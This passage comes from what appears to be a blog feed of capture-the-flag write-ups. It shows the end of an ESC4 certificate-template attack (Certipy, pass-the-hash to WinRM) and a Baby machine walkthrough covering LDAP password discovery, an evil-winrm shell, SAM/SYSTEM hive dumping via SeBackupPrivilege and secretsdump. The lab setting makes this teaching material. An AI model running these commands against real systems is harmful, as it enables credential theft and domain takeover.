-hashes :3b181b914e7a9d5508ea1e20bc2b7fce -vulnerable -stdout</span><br><span class="line">Certipy v4.8.2 - by Oliver Lyak (ly4k)</span><br><span class="line"></span><br><span class="line">[*] Finding certificate templates</span><br><span class="line">[*] Found 34 certificate templates</span><br><span class="line">[*] Finding certificate authorities</span><br><span class="line">[*] Found 1 certificate authority</span><br><span class="line">[*] Found 12 enabled certificate templates</span><br><span class="line">[*] Trying to get CA configuration for &#x27;sequel-DC01-CA&#x27; via CSRA</span><br><span class="line">[!] Got error while trying to get CA configuration for &#x27;sequel-DC01-CA&#x27; via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.</span><br><span class="line">[*] Trying to get CA configuration for &#x27;sequel-DC01-CA&#x27; via RRP</span><br><span class="line">[!] Failed to connect to remote registry. Service should be starting now. Trying again...</span><br><span class="line">[*] Got CA configuration for &#x27;sequel-DC01-CA&#x27;</span><br><span class="line">[*] Enumeration output:</span><br><span class="line">Certificate Authorities</span><br><span class="line">  0</span><br><span class="line">    CA Name                             : sequel-DC01-CA</span><br><span class="line">    DNS Name                            : DC01.sequel.htb</span><br><span class="line">    Certificate Subject                 : CN=sequel-DC01-CA, DC=sequel, DC=htb</span><br><span class="line">    Certificate Serial Number           : 152DBD2D8E9C079742C0F3BFF2A211D3</span><br><span class="line">    Certificate Validity Start          : 2024-06-08 16:50:40+00:00</span><br><span class="line">    Certificate Validity End            : 2124-06-08 17:00:40+00:00</span><br><span class="line">    Web Enrollment                      : Disabled</span><br><span class="line">    User Specified SAN                  : Disabled</span><br><span class="line">    Request Disposition                 : Issue</span><br><span class="line">    Enforce Encryption for Requests     : Enabled</span><br><span class="line">    Permissions</span><br><span class="line">      Owner                             : SEQUEL.HTB\Administrators</span><br><span class="line">      Access Rights</span><br><span class="line">        ManageCertificates              : SEQUEL.HTB\Administrators</span><br><span class="line">                                          SEQUEL.HTB\Domain Admins</span><br><span class="line">                                          SEQUEL.HTB\Enterprise Admins</span><br><span class="line">        ManageCa                        : SEQUEL.HTB\Administrators</span><br><span class="line">                                          SEQUEL.HTB\Domain Admins</span><br><span class="line">                                          SEQUEL.HTB\Enterprise Admins</span><br><span class="line">        Enroll                          : SEQUEL.HTB\Authenticated Users</span><br><span class="line">Certificate Templates</span><br><span class="line">  0</span><br><span class="line">    Template Name                       : DunderMifflinAuthentication</span><br><span class="line">    Display Name                        : Dunder Mifflin Authentication</span><br><span class="line">    Certificate Authorities             : sequel-DC01-CA</span><br><span class="line">    Enabled                             : True</span><br><span class="line">    Client Authentication               : True</span><br><span class="line">    Enrollment Agent                    : False</span><br><span class="line">    Any Purpose                         : False</span><br><span class="line">    Enrollee Supplies Subject           : False</span><br><span class="line">    Certificate Name Flag               : SubjectRequireCommonName</span><br><span class="line">                                          SubjectAltRequireDns</span><br><span class="line">    Enrollment Flag                     : AutoEnrollment</span><br><span class="line">                                          PublishToDs</span><br><span class="line">    Private Key Flag                    : 16842752</span><br><span class="line">    Extended Key Usage                  : Client Authentication</span><br><span class="line">                                          Server Authentication</span><br><span class="line">    Requires Manager Approval           : False</span><br><span class="line">    Requires Key Archival               : False</span><br><span class="line">    Authorized Signatures Required      : 0</span><br><span class="line">    Validity Period                     : 1000 years</span><br><span class="line">    Renewal Period                      : 6 weeks</span><br><span class="line">    Minimum RSA Key Length              : 2048</span><br><span class="line">    Permissions</span><br><span class="line">      Enrollment Permissions</span><br><span class="line">        Enrollment Rights               : SEQUEL.HTB\Domain Admins</span><br><span class="line">                                          SEQUEL.HTB\Enterprise Admins</span><br><span class="line">      Object Control Permissions</span><br><span class="line">        Owner                           : SEQUEL.HTB\Enterprise Admins</span><br><span class="line">        Full Control Principals         : SEQUEL.HTB\Cert Publishers</span><br><span class="line">        Write Owner Principals          : SEQUEL.HTB\Domain Admins</span><br><span class="line">                                          SEQUEL.HTB\Enterprise Admins</span><br><span class="line">                                          SEQUEL.HTB\Administrator</span><br><span class="line">                                          SEQUEL.HTB\Cert Publishers</span><br><span class="line">        Write Dacl Principals           : SEQUEL.HTB\Domain Admins</span><br><span class="line">                                          SEQUEL.HTB\Enterprise Admins</span><br><span class="line">                                          SEQUEL.HTB\Administrator</span><br><span class="line">                                          SEQUEL.HTB\Cert Publishers</span><br><span class="line">        Write Property Principals       : SEQUEL.HTB\Domain Admins</span><br><span class="line">                                          SEQUEL.HTB\Enterprise Admins</span><br><span class="line">                                          SEQUEL.HTB\Administrator</span><br><span class="line">                                          SEQUEL.HTB\Cert Publishers</span><br><span class="line">    [!] Vulnerabilities</span><br><span class="line">      ESC4                              : &#x27;SEQUEL.HTB\\Cert Publishers&#x27; has dangerous permissions</span><br><span class="line">➜  EscapeTwo </span><br></pre></td></tr></table></figure></div><h4 id="ESC4-template-exploitation"><a href="#ESC4-template-exploitation" class="headerlink" title="ESC4 template exploitation"></a>ESC4 template exploitation</h4><p>We updated the certificate <code>DunderMifflinAuthentication</code> using certipy and requested a certificate with upn of <code>Administrator@sequel.htb</code></p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">➜  EscapeTwo certipy template -u CA_SVC@sequel.htb -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -template DunderMifflinAuthentication -save-old -dc-ip 10.10.11.51 -debug </span><br><span class="line">Certipy v4.8.2 - by Oliver Lyak (ly4k)</span><br><span class="line"></span><br><span class="line">[+] Authenticating to LDAP server</span><br><span class="line">[+] Bound to ldaps://10.10.11.51:636 - ssl</span><br><span class="line">[+] Default path: DC=sequel,DC=htb</span><br><span class="line">[+] Configuration path: CN=Configuration,DC=sequel,DC=htb</span><br><span class="line">[*] Saved old configuration for &#x27;DunderMifflinAuthentication&#x27; to &#x27;DunderMifflinAuthentication.json&#x27;</span><br><span class="line">[*] Updating certificate template &#x27;DunderMifflinAuthentication&#x27;</span><br><span class="line">[+] MODIFY_DELETE:</span><br><span class="line">[+]     pKIExtendedKeyUsage: []</span><br><span class="line">[+]     msPKI-Certificate-Application-Policy: []</span><br><span class="line">[+] MODIFY_REPLACE:</span><br><span class="line">[+]     nTSecurityDescriptor: [b&#x27;\x01\x00\x04\x9c0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x02\x00\x1c\x00\x01\x00\x00\x00\x00\x00\x14\x00\xff\x01\x0f\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\xc8\xa3\x1f\xdd\xe9\xba\xb8\x90,\xaes\xbb\xf4\x01\x00\x00&#x27;]</span><br><span class="line">[+]     flags: [b&#x27;0&#x27;]</span><br><span class="line">[+]     pKIDefaultKeySpec: [b&#x27;2&#x27;]</span><br><span class="line">[+]     pKIKeyUsage: [b&#x27;\x86\x00&#x27;]</span><br><span class="line">[+]     pKIMaxIssuingDepth: [b&#x27;-1&#x27;]</span><br><span class="line">[+]     pKICriticalExtensions: [b&#x27;2.5.29.19&#x27;, b&#x27;2.5.29.15&#x27;]</span><br><span class="line">[+]     pKIExpirationPeriod: [b&#x27;\x00@\x1e\xa4\xe8e\xfa\xff&#x27;]</span><br><span class="line">[+]     pKIDefaultCSPs: [b&#x27;1,Microsoft Enhanced Cryptographic Provider v1.0&#x27;]</span><br><span class="line">[+]     msPKI-Enrollment-Flag: [b&#x27;0&#x27;]</span><br><span class="line">[+]     msPKI-Private-Key-Flag: [b&#x27;16842768&#x27;]</span><br><span class="line">[+]     msPKI-Certificate-Name-Flag: [b&#x27;1&#x27;]</span><br><span class="line">[*] Successfully updated &#x27;DunderMifflinAuthentication&#x27;</span><br><span class="line">➜  EscapeTwo certipy req -u CA_SVC@sequel.htb -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -ca sequel-DC01-CA -template DunderMifflinAuthentication -upn administrator@sequel.htb -dc-ip 10.10.11.51 -debug</span><br><span class="line">Certipy v4.8.2 - by Oliver Lyak (ly4k)</span><br><span class="line"></span><br><span class="line">[+] Generating RSA key</span><br><span class="line">[*] Requesting certificate via RPC</span><br><span class="line">[+] Trying to connect to endpoint: ncacn_np:10.10.11.51[\pipe\cert]</span><br><span class="line">[+] Connected to endpoint: ncacn_np:10.10.11.51[\pipe\cert]</span><br><span class="line">[*] Successfully requested certificate</span><br><span class="line">[*] Request ID is 5</span><br><span class="line">[*] Got certificate with UPN &#x27;administrator@sequel.htb&#x27;</span><br><span class="line">[*] Certificate has no object SID</span><br><span class="line">[*] Saved certificate and private key to &#x27;administrator.pfx&#x27;</span><br></pre></td></tr></table></figure></div><p>With the <code>administrator.pfx</code> certificate we can request for an NT hash and login as <code>Administrator</code> into machine.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">➜  EscapeTwo certipy auth -pfx administrator.pfx</span><br><span class="line">Certipy v4.8.2 - by Oliver Lyak (ly4k)</span><br><span class="line"></span><br><span class="line">[*] Using principal: administrator@sequel.htb</span><br><span class="line">[*] Trying to get TGT...</span><br><span class="line">[*] Got TGT</span><br><span class="line">[*] Saved credential cache to &#x27;administrator.ccache&#x27;</span><br><span class="line">[*] Trying to retrieve NT hash for &#x27;administrator&#x27;</span><br><span class="line">[*] Got hash for &#x27;administrator@sequel.htb&#x27;: aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff</span><br><span class="line">➜  EscapeTwo </span><br></pre></td></tr></table></figure></div><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">➜  EscapeTwo nxc winrm 10.10.11.51 -u Administrator -H 7a8d4e04986afa8ed4060f75e5a0b3ff</span><br><span class="line">WINRM       10.10.11.51     5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)</span><br><span class="line">WINRM       10.10.11.51     5985   DC01             [+] sequel.htb\Administrator:7a8d4e04986afa8ed4060f75e5a0b3ff (Pwn3d!)</span><br><span class="line">➜  EscapeTwo </span><br></pre></td></tr></table></figure></div>]]></content>
    
    
      
      
    <summary type="html">&lt;link rel=&quot;stylesheet&quot; class=&quot;aplayer-secondary-style-marker&quot; href=&quot;/assets/css/APlayer.min.css&quot;&gt;&lt;script src=&quot;/assets/js/APlayer.min.js&quot; cla</summary>
      
    
    
    
    <category term="Hack The Box" scheme="http://example.com/categories/Hack-The-Box/"/>
    
    
    <category term="Active Directory" scheme="http://example.com/tags/Active-Directory/"/>
    
    <category term="Hack The Box" scheme="http://example.com/tags/Hack-The-Box/"/>
    
    <category term="Impacket" scheme="http://example.com/tags/Impacket/"/>
    
    <category term="bloodyAD" scheme="http://example.com/tags/bloodyAD/"/>
    
    <category term="ADCS" scheme="http://example.com/tags/ADCS/"/>
    
    <category term="ESC4" scheme="http://example.com/tags/ESC4/"/>
    
    <category term="dacledit" scheme="http://example.com/tags/dacledit/"/>
    
    <category term="GenericAll" scheme="http://example.com/tags/GenericAll/"/>
    
    <category term="mssql" scheme="http://example.com/tags/mssql/"/>
    
  </entry>
  
  <entry>
    <title>Baby - Vulnlab - Windows - Easy</title>
    <link href="http://example.com/2025/02/20/Baby/"/>
    <id>http://example.com/2025/02/20/Baby/</id>
    <published>2025-02-20T08:16:00.000Z</published>
    <updated>2026-06-06T09:05:49.871Z</updated>
    
    <content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="/assets/css/APlayer.min.css"><script src="/assets/js/APlayer.min.js" class="aplayer-secondary-script-marker"></script><p>Baby is an Easy windows machine from Vulnlab, in which we start with ldapsearch and get a users password from a description and after resetting that users password we will be able to login to winrm and setbackup priv is enabled for that user and we will dump sam and system from machine, </p><h3 id="Nmap"><a href="#Nmap" class="headerlink" title="Nmap"></a>Nmap</h3><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line">➜  Baby nmap -v -Pn 10.10.96.24                   </span><br><span class="line">Host discovery disabled (-Pn). All addresses will be marked &#x27;up&#x27; and scan times may be slower.</span><br><span class="line">Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-08 06:35 EDT</span><br><span class="line">Initiating Parallel DNS resolution of 1 host. at 06:35</span><br><span class="line">Completed Parallel DNS resolution of 1 host. at 06:35, 0.00s elapsed</span><br><span class="line">Initiating SYN Stealth Scan at 06:35</span><br><span class="line">Scanning 10.10.96.24 [1000 ports]</span><br><span class="line">Discovered open port 139/tcp on 10.10.96.24</span><br><span class="line">Discovered open port 135/tcp on 10.10.96.24</span><br><span class="line">Discovered open port 3389/tcp on 10.10.96.24</span><br><span class="line">Discovered open port 53/tcp on 10.10.96.24</span><br><span class="line">Discovered open port 445/tcp on 10.10.96.24</span><br><span class="line">Discovered open port 464/tcp on 10.10.96.24</span><br><span class="line">Discovered open port 636/tcp on 10.10.96.24</span><br><span class="line">Discovered open port 5357/tcp on 10.10.96.24</span><br><span class="line">Discovered open port 389/tcp on 10.10.96.24</span><br><span class="line">Discovered open port 593/tcp on 10.10.96.24</span><br><span class="line">Discovered open port 3268/tcp on 10.10.96.24</span><br><span class="line">Discovered open port 88/tcp on 10.10.96.24</span><br><span class="line">Discovered open port 3269/tcp on 10.10.96.24</span><br><span class="line">Completed SYN Stealth Scan at 06:35, 8.44s elapsed (1000 total ports)</span><br><span class="line">Nmap scan report for 10.10.96.24</span><br><span class="line">Host is up (0.16s latency).</span><br><span class="line">Not shown: 987 filtered tcp ports (no-response)</span><br><span class="line">PORT     STATE SERVICE</span><br><span class="line">53/tcp   open  domain</span><br><span class="line">88/tcp   open  kerberos-sec</span><br><span class="line">135/tcp  open  msrpc</span><br><span class="line">139/tcp  open  netbios-ssn</span><br><span class="line">389/tcp  open  ldap</span><br><span class="line">445/tcp  open  microsoft-ds</span><br><span class="line">464/tcp  open  kpasswd5</span><br><span class="line">593/tcp  open  http-rpc-epmap</span><br><span class="line">636/tcp  open  ldapssl</span><br><span class="line">3268/tcp open  globalcatLDAP</span><br><span class="line">3269/tcp open  globalcatLDAPssl</span><br><span class="line">3389/tcp open  ms-wbt-server</span><br><span class="line">5357/tcp open  wsdapi</span><br><span class="line"></span><br><span class="line">Read data files from: /usr/share/nmap</span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 8.52 seconds</span><br><span class="line">           Raw packets sent: 1990 (87.560KB) | Rcvd: 16 (704B)</span><br><span class="line">➜  Baby </span><br></pre></td></tr></table></figure></div><h3 id="Ldapsearch"><a href="#Ldapsearch" class="headerlink" title="Ldapsearch"></a>Ldapsearch</h3><p>Ldapsearch performs an anonymous LDAP query to the LDAP server at 10.10.96.24, searching for all available objects under the domain <code>baby.vl</code>.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">➜  Baby ldapsearch -x -b &quot;DC=baby,DC=vl&quot; -H ldap://10.10.96.24 &quot;*&quot; | tee ldap_out</span><br></pre></td></tr></table></figure></div><p>By grepping for “pass” in the output, we found a description revealing an initial password:</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">➜  Baby cat ldap_out | grep pass</span><br><span class="line">description: Members in this group can have their passwords replicated to all </span><br><span class="line">description: Members in this group cannot have their passwords replicated to a</span><br><span class="line">description: Set initial password to `BabyStart123!`</span><br></pre></td></tr></table></figure></div><p>Pass: <code>BabyStart123!</code></p><p>Got a potential password, so checked if it works for any users. Using CME, got a hit on Caroline.Robinson:</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">➜  Baby cme smb 10.10.96.24 -u user.txt -p &#x27;BabyStart123!&#x27; </span><br><span class="line">SMB         10.10.96.24     445    BABYDC           [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE </span><br></pre></td></tr></table></figure></div><p>I tested the password BabyStart123! using CME and found it valid for Caroline.Robinson, but the password had to be changed. Using smbpasswd, I updated it to Sebin#321.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">➜  Baby smbpasswd -r 10.10.96.24 -U Caroline.Robinson</span><br><span class="line">Old SMB password: BabyStart123!</span><br><span class="line">New SMB password: Sebin#321</span><br><span class="line">Retype new SMB password: Sebin#321</span><br><span class="line">Password changed for user Caroline.Robinson</span><br><span class="line">➜  Vulnlab</span><br></pre></td></tr></table></figure></div><p>New password: <code>Caroline.Robinson:Sebin#321</code></p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">➜  Baby nxc winrm 10.10.96.24 -u Caroline.Robinson -p &#x27;Sebin#321&#x27;</span><br><span class="line">WINRM       10.10.96.24     5985   BABYDC           [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl)</span><br><span class="line">WINRM       10.10.96.24     5985   BABYDC           [+] baby.vl\Caroline.Robinson:Sebin#321 (Pwn3d!)</span><br><span class="line">➜  Baby </span><br></pre></td></tr></table></figure></div><p>After that, i logged in via WinRM with the new password and got a shell.</p><h3 id="User"><a href="#User" class="headerlink" title="User"></a>User</h3><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">➜  Baby evil-winrm -i 10.10.96.24 -u Caroline.Robinson -p &#x27;Sebin#321&#x27;       </span><br><span class="line">                                        </span><br><span class="line">Evil-WinRM shell v3.5</span><br><span class="line">                                        </span><br><span class="line">Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine</span><br><span class="line">                                        </span><br><span class="line">Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion</span><br><span class="line">                                        </span><br><span class="line">Info: Establishing connection to remote endpoint</span><br><span class="line">*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents&gt; cd ../Desktop</span><br><span class="line">*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop&gt; dir</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    Directory: C:\Users\Caroline.Robinson\Desktop</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Mode                 LastWriteTime         Length Name</span><br><span class="line">----                 -------------         ------ ----</span><br><span class="line">-a----         6/21/2016   3:36 PM            527 EC2 Feedback.website</span><br><span class="line">-a----         6/21/2016   3:36 PM            554 EC2 Microsoft Windows Guide.website</span><br><span class="line">-a----        11/21/2021   3:24 PM             36 user.txt</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop&gt; type user.txt</span><br><span class="line">VL&#123;b2c6150b85125xxxxxxxxb253df9540d898&#125;</span><br><span class="line">*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop&gt; </span><br></pre></td></tr></table></figure></div><h3 id="Root"><a href="#Root" class="headerlink" title="Root"></a>Root</h3><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop&gt; whoami /priv</span><br><span class="line"></span><br><span class="line">PRIVILEGES INFORMATION</span><br><span class="line">----------------------</span><br><span class="line"></span><br><span class="line">Privilege Name                Description                    State</span><br><span class="line">============================= ============================== =======</span><br><span class="line">SeMachineAccountPrivilege     Add workstations to domain     Enabled</span><br><span class="line">SeBackupPrivilege             Back up files and directories  Enabled</span><br><span class="line">SeRestorePrivilege            Restore files and directories  Enabled</span><br><span class="line">SeShutdownPrivilege           Shut down the system           Enabled</span><br><span class="line">SeChangeNotifyPrivilege       Bypass traverse checking       Enabled</span><br><span class="line">SeIncreaseWorkingSetPrivilege Increase a process working set Enabled</span><br><span class="line">*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop&gt; cd c:\</span><br></pre></td></tr></table></figure></div><p><code>Caroline.Robinson</code> has <code>SeBackupPrivilege</code>, which allows us to back up files, including the SAM and SYSTEM hives. These contain password hashes, which can be extracted to escalate privileges.</p><p>Using <code>SeBackupPrivilege</code>, we successfully backed up and downloaded the SAM and SYSTEM registry hives. These will allow us to extract password hashes for privilege escalation.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop&gt; cd c:\</span><br><span class="line">*Evil-WinRM* PS C:\&gt; mkdir Temp</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    Directory: C:\</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Mode                 LastWriteTime         Length Name</span><br><span class="line">----                 -------------         ------ ----</span><br><span class="line">d-----         10/8/2024  10:59 AM                Temp</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">*Evil-WinRM* PS C:\&gt; </span><br><span class="line">*Evil-WinRM* PS C:\&gt; reg save hklm\sam c:\Temp\sam</span><br><span class="line">The operation completed successfully.                                                                                                                                                                           </span><br><span class="line">*Evil-WinRM* PS C:\&gt; reg save hklm\system c:\Temp\system</span><br><span class="line">The operation completed successfully.</span><br><span class="line">*Evil-WinRM* PS C:\temp&gt; download system</span><br><span class="line">Info: Downloading C:\temp\system to system</span><br><span class="line">Info: Download successful!                                                                                                                                                                                      </span><br><span class="line">*Evil-WinRM* PS C:\Temp&gt; download sam</span><br><span class="line">Info: Downloading C:\Temp\sam to sam</span><br><span class="line">Info: Download successful!</span><br><span class="line">*Evil-WinRM* PS C:\Temp&gt;  </span><br></pre></td></tr></table></figure></div><p>After downloading the SAM and SYSTEM hives, we used impacket-secretsdump to extract password hashes. We successfully retrieved the NTLM hash for the Administrator account, which can be used for further privilege escalation.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">➜  Baby impacket-secretsdump -sam sam -system system local </span><br><span class="line">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span><br><span class="line"></span><br><span class="line">[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88</span><br><span class="line">[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)</span><br><span class="line">Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::</span><br><span class="line">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</span><br><span class="line">DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</span><br><span class="line">[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn&#x27;t have hash information.</span><br><span class="line">[*] Cleaning up... </span><br><span class="line">➜  Baby </span><br></pre></td></tr></table></figure></div><p>The extracted NTLM hash belongs to the local Administrator account, which means it won’t work for domain authentication. To gain access as a Domain Admin, we need to dump the ntds.dit file, which contains all domain user hashes. Since we have SeBackupPrivilege, we can leverage it to extract the NTDS database and escalate further.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">➜  Baby evil-winrm -i 10.10.96.24 -u Administrator -H 8d992faed38128ae85e95fa35868bb43</span><br><span class="line">                                        </span><br><span class="line">Evil-WinRM shell v3.5</span><br><span class="line">                                        </span><br><span class="line">Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine</span><br><span class="line">                                        </span><br><span class="line">Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion</span><br><span class="line">                                        </span><br><span class="line">Info: Establishing connection to remote endpoint</span><br><span class="line">                                        </span><br><span class="line">Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError</span><br><span class="line">                                        </span><br><span class="line">Error: Exiting with code 1</span><br><span class="line">➜  Baby</span><br></pre></td></tr></table></figure></div><h4 id="Understanding-Local-vs-Domain-NT-Hashes-in-Windows-Authentication"><a href="#Understanding-Local-vs-Domain-NT-Hashes-in-Windows-Authentication" class="headerlink" title="Understanding Local vs. Domain NT Hashes in Windows Authentication"></a>Understanding Local vs. Domain NT Hashes in Windows Authentication</h4><p>When dumping hashes from a Windows machine, you may extract credentials from two sources: <strong>SAM</strong> (Security Account Manager) and <strong>NTDS.dit</strong> (Active Directory database). While both contain NT hashes, they serve different authentication purposes.  </p><ul><li><strong>SAM Hashes:</strong> Stored locally and used for non-domain accounts. These hashes cannot be used for domain authentication.  </li><li><strong>NTDS.dit Hashes:</strong> Contain credentials for Active Directory users. These hashes can be used for <strong>Pass-the-Hash (PtH)</strong> attacks on domain-joined machines.</li></ul><p>If you can’t authenticate using a SAM-extracted hash but succeed with an NTDS.dit hash, it’s because <strong>domain authentication requires the NTDS.dit hash</strong>, while SAM hashes are only valid for local logins.</p><p>This diskshadow script creates a persistent shadow copy of the C: drive and mounts it as Z:, allowing access to sensitive files like ntds.dit. The unix2dos command converts a Unix-format text file to DOS&#x2F;Windows format by replacing line endings (LF 